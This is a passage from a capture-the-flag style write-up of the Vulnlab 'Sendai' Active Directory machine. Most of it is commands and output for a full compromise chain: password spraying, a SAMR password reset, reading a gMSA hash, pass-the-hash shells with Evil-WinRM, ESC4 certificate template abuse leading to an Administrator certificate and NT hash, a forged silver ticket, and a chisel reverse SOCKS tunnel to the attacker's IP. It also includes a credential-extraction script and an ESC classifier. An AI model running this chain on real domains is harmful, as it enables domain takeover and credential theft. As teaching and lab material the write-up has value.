SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Lisa.Williams: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Ross.Sullivan: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Clifford.Davey: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Declan.Jenkins: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Lawrence.Grant: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Leslie.Johnson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Megan.Edwards: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\ca-operators: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\admsvc: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\mgtsvc$: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\support: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\: 
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]


Change the expired password over SAMR. impacket-smbpasswd is given the empty current password, and because the account is flagged password-must-change the DC lets the change through even though a normal logon would be refused. On a real engagement this is a destructive step (the user's own login breaks), so record it for the report:

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$  impacket-smbpasswd -newpass Passw0rd@ 'Elliot.Yates':@sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================

Current SMB password: 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

Enumerate shares as Elliot.Yates. The non-default "config" share holds a SQL connection string with the sqlsvc credentials in clear text:

┌──(puck㉿kali)-[~/vulnhub/sendai]
└─$ impacket-smbclient sendai.vl/'Elliot.Yates':'Passw0rd@'sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
config
IPC$
NETLOGON
sendai
SYSVOL
Users
# use config
# ls
drw-rw-rw-          0  Thu Jun 13 13:22:52 2024 .
drw-rw-rw-          0  Wed Jul 19 10:11:25 2023 ..
-rw-rw-rw-         78  Tue Jul 11 08:57:10 2023 .sqlconfig
# get .sqlconfig

---
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=Su<REDACTED>85;
---

┌──(puck㉿kali)-[~/vulnhub/sendai]
└─$ bloodhound-python -u sqlsvc -p Su<REDACTED>85 -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.69.199  
INFO: Found AD domain: sendai.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.sendai.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.sendai.vl
INFO: Found 27 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.sendai.vl
INFO: Done in 00M 09S

Import the collection into BloodHound and look at outbound object control for the accounts held so far (Elliot.Yates and sqlsvc).

Elliot.Yates has GenericAll over the ADMSVC group, and ADMSVC has ReadGMSAPassword over the group managed service account mgtsvc$. GenericAll on a group lets us add ourselves to it, after which the gMSA's managed password (msDS-ManagedPassword) can be read over LDAP and turned into an NT hash.

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ net rpc group addmem "ADMSVC" Elliot.Yates -U sendai.vl/Elliot.Yates -S sendai.vl
Password for [SENDAI.VL\Elliot.Yates]:Passw0rd@
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p Passw0rd@ --gmsa
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        dc.sendai.vl    636    DC               [+] sendai.vl\Elliot.Yates:Passw0rd@ 
LDAP        dc.sendai.vl    636    DC               [*] Getting GMSA Passwords
LDAP        dc.sendai.vl    636    DC               Account: mgtsvc$              NTLM: 57<REDACTED>11
                                                                                   

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec winrm sendai.vl -u 'mgtsvc$' -H 57<REDACTED>11

SMB         dc.sendai.vl    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
HTTP        dc.sendai.vl    5985   DC               [*] http://dc.sendai.vl:5985/wsman
WINRM       dc.sendai.vl    5985   DC               [+] sendai.vl\mgtsvc$:57<REDACTED>11 (Pwn3d!)

The gMSA NT hash works for WinRM, so Evil-WinRM onto the box as mgtsvc$ and run PrivescCheck.ps1. Keep in mind that a gMSA password rotates automatically (every 30 days by default), so the hash has a shelf life; re-read it from LDAP if it stops working.

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57<REDACTED>11 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> 
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cat c:\user.txt
VL{e01<REDACTED>62}

*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         6/14/2024   1:04 AM                temp


*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload PrivescCheck.ps1
                                        
Info: Uploading /home/puck/vulnlab/sendai/PrivescCheck.ps1 to C:\temp\PrivescCheck.ps1
                                        
Data: 394496 bytes of 394496 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> 
*Evil-WinRM* PS C:\temp>  . .\PrivescCheck.ps1; Invoke-PrivescCheck
+------+------------------------------------------------+------+
| TEST | USER > Privileges                              | VULN |
+------+------------------------------------------------+------+
| DESC | List the privileges that are associated to the        |
|      | current user's token. If any of them can be leveraged |
|      | to somehow run code in the context of the SYSTEM      |
|      | account, it will be reported as a finding.            |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | USER > Environment Variables                   | INFO |
+------+------------------------------------------------+------+
| DESC | List the environment variables of the current process |
|      | and try to identify any potentially sensitive         |
|      | information such as passwords or API secrets. This    |
|      | check is simply based on keyword matching and might   |
|      | not be entirely reliable.                             |
+------+-------------------------------------------------------+
[!] Nothing found.

+------+------------------------------------------------+------+
| TEST | SERVICES > Non-default Services                | INFO |
+------+------------------------------------------------+------+
| DESC | List all registered services and filter out the ones  |
|      | that are built into Windows. It does so by parsing    |
|      | the target executable's metadata.                     |
+------+-------------------------------------------------------+
[*] Found 13 result(s).


Name        : Amazon EC2Launch
DisplayName : Amazon EC2Launch
ImagePath   : "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : AmazonSSMAgent
DisplayName : Amazon SSM Agent
ImagePath   : "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : AWSLiteAgent
DisplayName : AWS Lite Guest Agent
ImagePath   : "C:\Program Files\Amazon\XenTools\LiteAgent.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : MSSQL$SQLEXPRESS
DisplayName : SQL Server (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
User        : SENDAI\sqlsvc
StartMode   : Automatic

Name        : SQLAgent$SQLEXPRESS
DisplayName : SQL Server Agent (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE" -i SQLEXPRESS
User        : NT AUTHORITY\NETWORKSERVICE
StartMode   : Disabled

Name        : SQLBrowser
DisplayName : SQL Server Browser
ImagePath   : "C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe"
User        : NT AUTHORITY\LOCALSERVICE
StartMode   : Disabled

Name        : SQLTELEMETRY$SQLEXPRESS
DisplayName : SQL Server CEIP service (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlceip.exe" -Service SQLEXPRESS
User        : NT Service\SQLTELEMETRY$SQLEXPRESS
StartMode   : Automatic

Name        : SQLWriter
DisplayName : SQL Server VSS Writer
ImagePath   : "C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Disabled

Name        : Support
DisplayName :
ImagePath   : C:\WINDOWS\helpdesk.exe -u clifford.davey -p RF<REDACTED>3p -k netsvcs
User        : LocalSystem
StartMode   : Automatic

Name        : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath   : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : vm3dservice
DisplayName : @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath   : C:\Windows\system32\vm3dservice.exe
User        : LocalSystem
StartMode   : Automatic

Name        : VMTools
DisplayName : VMware Tools
ImagePath   : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User        : LocalSystem
StartMode   : Automatic




+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - SCM                   | VULN |
+------+------------------------------------------------+------+
| DESC | Interact with the Service Control Manager (SCM) and   |
|      | check whether the current user can modify any         |
|      | registered service.                                   |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - Registry              | VULN |
+------+------------------------------------------------+------+
| DESC | Parse the registry and check whether the current user |
|      | can modify the configuration of any registered        |
|      | service.                                              |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | SERVICES > Binary Permissions                  | VULN |
+------+------------------------------------------------+------+
| DESC | List all services and check whether the current user  |
|      | can modify the target executable or write files in    |
|      | its parent folder.                                    |
+------+-------------------------------------------------------+

PrivescCheck reports nothing exploitable in the permission checks, but the informational service listing is the real finding: the Support service's ImagePath passes a domain user's credentials on the command line (-u clifford.davey -p ...). A service's ImagePath is typically readable by any authenticated user (sc qc, Get-CimInstance Win32_Service, or the registry key under HKLM\SYSTEM\CurrentControlSet\Services), so this is a cleartext credential disclosure rather than a service misconfiguration, and it gives us clifford.davey for the next step.
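PrivescCheck only lists the service, so a small scanner of your own is worth having for this class of finding. Added example in Python (not the page's or PrivescCheck's code): it pulls user/password pairs out of connection strings and service command lines in the three conventions commonly seen (key=value, getopt-style -u/-p, and /user:/pass:), run over constructed samples modelled on the .sqlconfig line and the Support service above. All secrets in the samples are dummies.

```python
import re

# Constructed inputs modelled on what the page surfaces: the connection string
# from the config share and service ImagePaths as PrivescCheck lists them.
# Every secret below is a dummy value.
SAMPLES = {
    ".sqlconfig": "Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=Dummy#1;",
    "svc:Support": r"C:\WINDOWS\helpdesk.exe -u clifford.davey -p Dummy_2 -k netsvcs",
    "svc:VMTools": r'"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"',
    "svc:Backup": r'"C:\tools\backup.exe" /user:svc_backup /pass:"Dummy three!" /log:C:\t.log',
}

# One pattern per convention; each yields the named groups 'user' and 'pw'.
PATTERNS = [
    # connection-string / ini style: User Id=x;Password=y  (pw runs to the next ';')
    re.compile(r'(?i)\buser(?: id|name)?\s*=\s*(?P<user>[^;\s]+).*?\b(?:password|pwd)\s*=\s*(?P<pw>[^;]+)'),
    # getopt style: -u x -p y / --user x --password y (quoted values may hold spaces)
    re.compile(r'(?i)(?:^|\s)(?:-u|--user(?:name)?)\s+(?P<user>\S+).*?\s(?:-p|--pass(?:word)?)\s+(?P<pw>"[^"]*"|\S+)'),
    # slash style: /user:x /pass:y
    re.compile(r'(?i)/user:(?P<user>\S+).*?/pass(?:word)?:(?P<pw>"[^"]*"|\S+)'),
]


def find_embedded_credentials(text):
    """Return {'user', 'password'} for the first credential pair found in a
    command line or connection string, or None if nothing matches."""
    for pat in PATTERNS:
        m = pat.search(text)
        if m:
            return {"user": m["user"], "password": m["pw"].strip('"')}
    return None


def scan(samples):
    """Map each source to the credentials found in it, skipping clean sources."""
    hits = {}
    for source, text in samples.items():
        creds = find_embedded_credentials(text)
        if creds:
            hits[source] = creds
    return hits


if __name__ == "__main__":
    for source, creds in scan(SAMPLES).items():
        print(f"{source}: {creds['user']} / {creds['password']}")
```

On a live box the inputs would be the ImagePath of every service (plus scheduled task actions and anything under a web root); the patterns are deliberately loose, so treat a hit as a lead to verify with crackmapexec rather than a confirmed credential.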

ADCS Enum with Certipy-ad

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p 'Passw0rd@' -M ADCS
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        dc.sendai.vl    389    DC               [+] sendai.vl\Elliot.Yates:Passw0rd@ 
ADCS                                                Found PKI Enrollment Server: dc.sendai.vl
ADCS                                                Found CN: sendai-DC-CA
ADCS                                                Found PKI Enrollment WebService: https://dc.sendai.vl/sendai-DC-CA_CES_Kerberos/service.svc/CES
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad find -u 'clifford.davey' -p 'RF<REDACTED>3p' -dc-ip 10.10.69.199 -dns-tcp -ns 10.10.69.199 -debug   
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.69.199:636 - ssl
[+] Default path: DC=sendai,DC=vl
[+] Configuration path: CN=Configuration,DC=sendai,DC=vl
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Trying to resolve 'dc.sendai.vl' at '10.10.69.199'
[*] Trying to get CA configuration for 'sendai-DC-CA' via CSRA
[+] Trying to get DCOM connection for: 10.10.69.199
[!] Got error while trying to get CA configuration for 'sendai-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sendai-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[+] Connected to remote registry at 'dc.sendai.vl' (10.10.69.199)
[*] Got CA configuration for 'sendai-DC-CA'
[+] Resolved 'dc.sendai.vl' from cache: 10.10.69.199
[+] Connecting to 10.10.69.199:80
[*] Saved BloodHound data to '20240614041344_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[+] Adding Domain Computers to list of current user's SIDs
[*] Saved text output to '20240614041344_Certipy.txt'
[*] Saved JSON output to '20240614041344_Certipy.json'
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

Findings. The only vulnerability flagged is ESC4: the ca-operators group has write permissions on a template, which turns out to be SendaiComputer.

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep ESC
        "ESC4": "'SENDAI.VL\\\\ca-operators' has dangerous permissions"

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep SendaiComputer
      "Template Name": "SendaiComputer",
      "Display Name": "SendaiComputer",

Abuse ESC4 as clifford.davey, who evidently has write access to the template (presumably through ca-operators). certipy's template command overwrites the template with a deliberately weak configuration (Authenticated Users can enroll and write, the enrollee supplies the subject, any-purpose EKU) and, with -save-old, backs up the original configuration so it can be restored afterwards:

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad template -username clifford.davey@sendai.vl -password RF<REDACTED>3p -template SendaiComputer -save-old -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

The command was run a second time. That is harmful rather than useful: with -save-old the second run overwrites SendaiComputer.json with the already-modified template, so the original configuration is lost and cannot be put back with certipy-ad template ... -configuration SendaiComputer.json. Run it once and keep the backup.

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad template -username clifford.davey@sendai.vl -password RF<REDACTED>3p  -template SendaiComputer -save-old -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
                                                                                              
Running certipy-ad find again shows the template is now vulnerable to ESC1 through ESC4:
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614042650_Certipy.json | grep ESC
        "ESC1": "'SENDAI.VL\\\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication",
        "ESC2": "'SENDAI.VL\\\\Authenticated Users' can enroll and template can be used for any purpose",
        "ESC3": "'SENDAI.VL\\\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set",
        "ESC4": "'SENDAI.VL\\\\Authenticated Users' has dangerous permissions"
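To make the ESC4-to-ESC1 chain concrete, an added example in Python (not certipy's code): a simplified classifier that applies the ESC1 to ESC4 rules to a template described as a dict, run over a constructed "before" model of SendaiComputer (only the ca-operators write right is taken from the page; the remaining attributes are assumptions) and the "after" state that the second find output describes. The flag bits and EKU OIDs are the real MS-CRTD values; the rules follow certipy's conventions, in particular that an any-purpose or empty EKU counts as both client authentication and enrollment agent.

```python
# Flag bits and EKU OIDs as defined for AD CS templates (MS-CRTD). The rules
# below are a simplified model of what certipy find reports for ESC1-ESC4.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag (manager approval)

EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
EKU_SERVER_AUTH = "1.3.6.1.5.5.7.3.1"
EKU_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
EKU_PKINIT_CLIENT = "1.3.6.1.5.2.3.4"
EKU_ANY_PURPOSE = "2.5.29.37.0"
EKU_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
AUTH_EKUS = {EKU_CLIENT_AUTH, EKU_SMARTCARD_LOGON, EKU_PKINIT_CLIENT}

LOW_PRIV = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}
HIGH_PRIV = {"Domain Admins", "Enterprise Admins", "Administrators"}


def classify(tpl):
    """Return the ESC findings for a template dict with keys: enroll (principals
    with enrollment rights), write (principals with write/owner rights),
    name_flag, enrollment_flag, ra_signatures, ekus."""
    ekus = set(tpl["ekus"])
    any_purpose = not ekus or EKU_ANY_PURPOSE in ekus   # no EKU at all == any purpose
    client_auth = any_purpose or bool(ekus & AUTH_EKUS)
    enrollment_agent = any_purpose or EKU_CERT_REQUEST_AGENT in ekus
    low_priv_enroll = bool(set(tpl["enroll"]) & LOW_PRIV)
    # Manager approval or a required RA signature gates the request, so the
    # enrollment-based issues (ESC1-3) need both to be off.
    gated = bool(tpl["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS) or tpl["ra_signatures"] > 0
    supplies_subject = bool(tpl["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)

    findings = []
    if low_priv_enroll and not gated and supplies_subject and client_auth:
        findings.append("ESC1")   # request any UPN, authenticate as it
    if low_priv_enroll and not gated and any_purpose:
        findings.append("ESC2")
    if low_priv_enroll and not gated and enrollment_agent:
        findings.append("ESC3")
    if set(tpl["write"]) - HIGH_PRIV:
        findings.append("ESC4")   # a non-admin can rewrite the template itself
    return findings


# Constructed model of SendaiComputer before the change. Only the ca-operators
# write right comes from the page; the other values are assumptions.
BEFORE = {
    "enroll": ["Domain Computers"],
    "write": ["ca-operators"],
    "name_flag": 0,                       # subject is built from the AD object
    "enrollment_flag": 0,
    "ra_signatures": 0,
    "ekus": [EKU_CLIENT_AUTH, EKU_SERVER_AUTH],
}

# After certipy-ad template: Authenticated Users can enroll and write, the
# enrollee supplies the subject, any-purpose EKU (matching the second find
# output above; the exact EKU list is an assumption).
AFTER = dict(BEFORE,
             enroll=["Authenticated Users"],
             write=["Authenticated Users"],
             name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
             ekus=[EKU_ANY_PURPOSE])

if __name__ == "__main__":
    print("before:", classify(BEFORE))   # ['ESC4']
    print("after: ", classify(AFTER))    # ['ESC1', 'ESC2', 'ESC3', 'ESC4']
```

The gating check is the part worth keeping in mind defensively: turning on manager approval (CT_FLAG_PEND_ALL_REQUESTS) or requiring an RA signature neutralises ESC1 to ESC3 on an otherwise weak template, but does nothing about ESC4, which is fixed only by tightening the template's DACL.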

Request a certificate for the Administrator UPN (ESC1: the template now lets the enrollee supply the subject alternative name):

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace

Fixed the "NETBIOS connection with the remote host timed out" error by changing the /etc/hosts order to

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat /etc/hosts | grep sendai
10.10.69.199 sendai.vl dc.sendai.vl

Try again

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with UPN 'administrator@sendai.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Authenticate with the certificate (PKINIT) to obtain a TGT, then recover the NT hash. Note the "Certificate has no object SID" line: the certificate lacks the SID extension that DCs require once strong certificate mapping enforcement (KB5014754) is switched on; this DC still accepts the UPN mapping, so the chain works, but on a hardened domain this step is where it would fail.

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad auth -pfx administrator.pfx -domain sendai.vl -username administrator -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sendai.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cf<REDACTED>7a
                                                                                               
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u administrator -H cf<REDACTED>7a
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir


    Directory: C:\Users\Administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/18/2023   6:15 AM             36 root.txt


*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
VL{ae<REDACTED>61}
*Evil-WinRM* PS C:\Users\Administrator\desktop>

That’s all.

Another way to root (unfinished): forge a silver ticket for the MSSQL service and use it over a SOCKS tunnel. One caveat applies to the commands below: a silver ticket must be encrypted with the key of the account the service runs as, and the SQL Server service runs as SENDAI\sqlsvc (see the service list above), so the mgtsvc$ gMSA hash passed to -nthash is not the right key for MSSQL/dc.sendai.vl.

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ ticketer.py -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57<REDACTED>11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
ticketer.py: command not found
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ impacket-ticketer -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57<REDACTED>11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sendai.vl/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ 

Set up a chisel server with reverse SOCKS on the attack box (the session line appears once the client on the target connects):

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ chisel server -p 8001 --reverse
2024/06/14 08:21:52 server: Reverse tunnelling enabled
2024/06/14 08:21:52 server: Fingerprint 6C2g9JWtYeT92LZsgr5dckEz87F24T+dsXH6dsDjhDo=
2024/06/14 08:21:52 server: Listening on http://0.0.0.0:8001
2024/06/14 08:24:27 server: session#1: Client version (1.9.1) differs from server version (1.9.1-0kali1)
2024/06/14 08:24:27 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

Then, with the forged ticket in KRB5CCNAME, connect to MSSQL through the SOCKS proxy:

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ export KRB5CCNAME=Administrator.ccache          
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ proxychains impacket-mssqlclient dc.sendai.vl -k
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.sendai.vl:1433  ...  OK
[*] Encryption required, switching to TLS
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]

and on the Sendai box, start the chisel client (this has to be running before the proxychains command above):

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57<REDACTED>11 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload chisel.exe
                                        
Info: Uploading /home/puck/vulnlab/sendai/chisel.exe to C:\temp\chisel.exe
                                        
Data: 12008104 bytes of 12008104 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\temp> ./chisel.exe client 10.8.2.138:8001 R:1080:socks
chisel.exe : 2024/06/14 05:24:26 client: Connecting to ws://10.8.2.138:8001
    + CategoryInfo          : NotSpecified: (2024/06/14 05:2...10.8.2.138:8001:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2024/06/14 05:24:26 client: Connected (Latency 20.3373ms)

Work in progress. The tunnel itself works, as a request to the DC's local IIS through the proxy shows:

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ proxychains curl http://127.0.0.1     
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  127.0.0.1:80  ...  OK
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
    color:#000000;
    background-color:#0072C6;
    margin:0;
}

#container {
    margin-left:auto;
    margin-right:auto;
    text-align:center;
    }

a img {
    border:none;
